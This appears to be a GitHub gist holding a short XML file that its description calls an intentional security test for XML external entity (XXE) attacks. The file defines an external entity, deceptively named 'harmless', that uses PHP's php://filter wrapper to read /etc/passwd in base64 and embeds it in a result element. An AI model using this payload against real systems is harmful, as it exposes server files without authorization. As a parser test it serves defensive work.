Skip to content

Instantly share code, notes, and snippets.

@LionsAd
Created March 2, 2022 13:42
Show Gist options
  • Save LionsAd/b5a87d53428cc86a773ebcd5eac81988 to your computer and use it in GitHub Desktop.
Save LionsAd/b5a87d53428cc86a773ebcd5eac81988 to your computer and use it in GitHub Desktop.
A XML file with a XEE attack included (intentional security test)
<?xml version="1.0"?>
<!DOCTYPE results [
<!ENTITY harmless SYSTEM
"php://filter/read=convert.base64-encode/resource=/etc/passwd"
>
]>
<results>
<result>&harmless;</result>
</results>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment